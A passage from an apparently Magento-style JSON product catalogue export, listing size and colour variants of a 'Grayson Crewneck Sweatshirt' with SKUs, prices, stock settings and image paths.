rt_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH10-XS-Black,size=XS,color=Black|sku=MH10-XS-Blue,size=XS,color=Blue|sku=MH10-XS-Red,size=XS,color=Red|sku=MH10-S-Black,size=S,color=Black|sku=MH10-S-Blue,size=S,color=Blue|sku=MH10-S-Red,size=S,color=Red|sku=MH10-M-Black,size=M,color=Black|sku=MH10-M-Blue,size=M,color=Blue|sku=MH10-M-Red,size=M,color=Red|sku=MH10-L-Black,size=L,color=Black|sku=MH10-L-Blue,size=L,color=Blue|sku=MH10-L-Red,size=L,color=Red|sku=MH10-XL-Black,size=XL,color=Black|sku=MH10-XL-Blue,size=XL,color=Blue|sku=MH10-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Wool|LumaTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"160\":{\"sku\":\"MH11-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XS-Orange\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"161\":{\"sku\":\"MH11-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XS-Red\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"162\":{\"sku\":\"MH11-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XS-White\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"163\":{\"sku\":\"MH11-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -S-Orange\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"164\":{\"sku\":\"MH11-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -S-Red\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"165\":{\"sku\":\"MH11-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -S-White\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"166\":{\"sku\":\"MH11-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -M-Orange\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"167\":{\"sku\":\"MH11-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -M-Red\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"168\":{\"sku\":\"MH11-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"produc